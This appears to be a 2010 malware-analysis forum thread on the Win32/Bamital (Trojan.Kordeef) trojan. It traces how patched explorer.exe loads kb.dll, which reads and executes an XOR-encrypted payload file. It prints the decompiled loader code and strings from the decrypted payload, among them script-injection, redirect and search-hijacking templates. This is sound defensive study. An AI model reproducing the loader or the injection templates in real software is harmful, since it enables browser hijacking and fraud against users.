Win32/Bamital

Forum for analysis and discussion about malware.
markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Win32/Bamital

Post by markusg » Sat Dec 11, 2010 1:47 pm

Hi,
is Trojan.Kordeef a new one, could not find any infos.
removed 2 patched system files winlogon and explorer.exe from infected machine.
files attached.
http://www.virustotal.com/file-scan/rep ... 1292072505
http://www.virustotal.com/file-scan/rep ... 1292072830
You do not have the required permissions to view the files attached to this post.

4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: Trojan.Kordeef  (patched files)

Post by 4everyone » Sat Dec 11, 2010 2:23 pm

Bamital used to patch WInlogon.exe & Explorer.exe. Trojan.Kordeef looks new for me.. Lemme check whether i can find any difference between Bamital & Kordeef :)

BTB,

Bamital posts can be found here..

http://www.kernelmode.info/forum/viewto ... ital#p2095

User avatar
EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Trojan.Kordeef  (patched files)

Post by EP_X0FF » Sat Dec 11, 2010 5:22 pm

Is the any kb.dll available? :)
I see it loads it on overwritten entry point (explorer.exe)
Ring0 - the source of inspiration

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan.Kordeef  (patched files)

Post by markusg » Sat Dec 11, 2010 6:31 pm

sorry yes :-)
You do not have the required permissions to view the files attached to this post.

User avatar
EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Trojan.Kordeef  (patched files)

Post by EP_X0FF » Sun Dec 12, 2010 3:50 am

Sorry, but there seems to be also another file named C:\WINDOWS\system32\dll
Can you please upload it? :)

Code: Select all

BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
  void *pCode; 
  if ( fdwReason == 1 )
  {
    pCode = ReadExecutableCode("C:\\WINDOWS\\system32\\dll");
    if ( pCode )
      ((void (__thiscall *)(_DWORD))pCode)(pCode);
  }
  return 0;
}
Ring0 - the source of inspiration

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan.Kordeef  (patched files)

Post by markusg » Sun Dec 12, 2010 10:34 am

ok there is an other one
You do not have the required permissions to view the files attached to this post.

User avatar
EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Trojan.Kordeef  (patched files)

Post by EP_X0FF » Sun Dec 12, 2010 10:48 am

Maybe I should be more clear regarding this http://www.kernelmode.info/forum/viewto ... 3943#p3943 :)

The code above is what exactly doing this kb.dll loaded by patched explorer.exe

kb.dll reads file named C:\WINDOWS\System32\dll and then executes it.

That's why I'm asking about this file because it can help to understand how does all this puzzle work :)
Ring0 - the source of inspiration

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan.Kordeef  (patched files)

Post by markusg » Sun Dec 12, 2010 10:55 am

ok sorry. i have understand it wrong, i have at first to search this file. its not removed yet. give me a bit time :-)

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan.Kordeef  (patched files)

Post by markusg » Sun Dec 12, 2010 5:26 pm

i found on an other pc perhaps an dropper.
it creates same dll files.
You do not have the required permissions to view the files attached to this post.

User avatar
EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Trojan.Kordeef  (patched files)

Post by EP_X0FF » Sun Dec 12, 2010 5:53 pm

Yes you right, this is dropper.

Dropper VT result
http://www.virustotal.com/file-scan/rep ... 1292176900

C:'\Windows\System32\dll is payload code, encrypted by xor.

Once infected explorer.exe starts in loads kb.dll which reads C:\windows\system32\dll and then kb.dll executes it.

Infected Explorer.exe/Winlogon.exe --> C:\Windows\system32\kb.dll --> Read/Execute --> C:\Windows\System32\dll --> Decrypt/Execute --> Profit :)

New code decrypts itself in simple loop

Image

and then executes all the rest.

String data from decrypted "dll"
15 X_if _if c h r o m e . e x e f i r e f o x . e x e o p e r a . e x e i e x p l o r e . e x e GET HTTP/1.1
Host: &version= Run Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry Flag GetUserGeoID SYSTEM\CurrentControlSet\Services\sr\Parameters
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore FirstRun DisableSR \user32.dll kb.dll k b . d l l
\updhlp.dat open -new-window <script src="http:// " type="text/javascript"></script> Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
19792079 [%subid] <d> </d> <m> </m> <e> </e> <f> </f> <j> </j> <c> </c> <u> </u> <t> </t> <p> </p> <k> </k> <b> </b> <p> </p> <k> </k> [%key] [%subid] </ul>
google.com/ Date: X55 Fut 2999 </title> <r> </r> **http%3a// User-Agent: Accept-Encoding: Content-Type: text/html GET /search GET /s? google. search.yahoo.com
bing.com ?subid= &id= .info/message.php \temp.ini \user32.dll TimeGetWork Uses32 ExitTime Ver Decode Domen Flags \admin.txt .gif .jp .png .js .ico .css .aspx /
iexplore.exe .upd & q= p= text= "> % <d> </d> <s> </s> <i> </i> &HTTP_REFERER= \ PROCESSOR_IDENTIFIER &os= &br= IE Op FF Ch &flg= &ad= &ver= \server.dat \Windows
\winhelp.exe Exists555 Explorer555 Global\EventHlpFile Global\EventHlpFile2 HlpMap555
<title> - porno yschttl spt" href="http:// <div><a href="http://rds.yahoo.com <em> </em> <a href="http:// sb_tlst"><h3><a href="http://
class="sb_ads <a href="http:// " <em> </em> 19091979 \Server HTTP/1.1 302 Moved Temporarily
Location: Connection: keep-alive
Content-Length: 0
Connection: close
HTTP/1.1 200 OK
<html><head><script language="JavaScript">function f(){var form = document.forms["rr"];form.submit();}if(document.cookie=="")
{if (history.length!=0) document.cookie="k=1";window.onload=f;}else{document.cookie="k=1;expires=Mon, 01-Jan-2001 00:00:00 GMT";history.back();}</script></head><body><form action="http:// " method="post" name="rr"></form></body></html> 8 / <html><head></head><body><script type="text/javascript">location.href="http:// ";
</script></body></html> N0
<title> </title> <meta keyword > </head> Content-Length: Accept-Encoding: </body> </html> Host: Referer: http:// gzip sdch none HTTP/1. 200 OK _
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
decrypted stuff attached
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration

Post Reply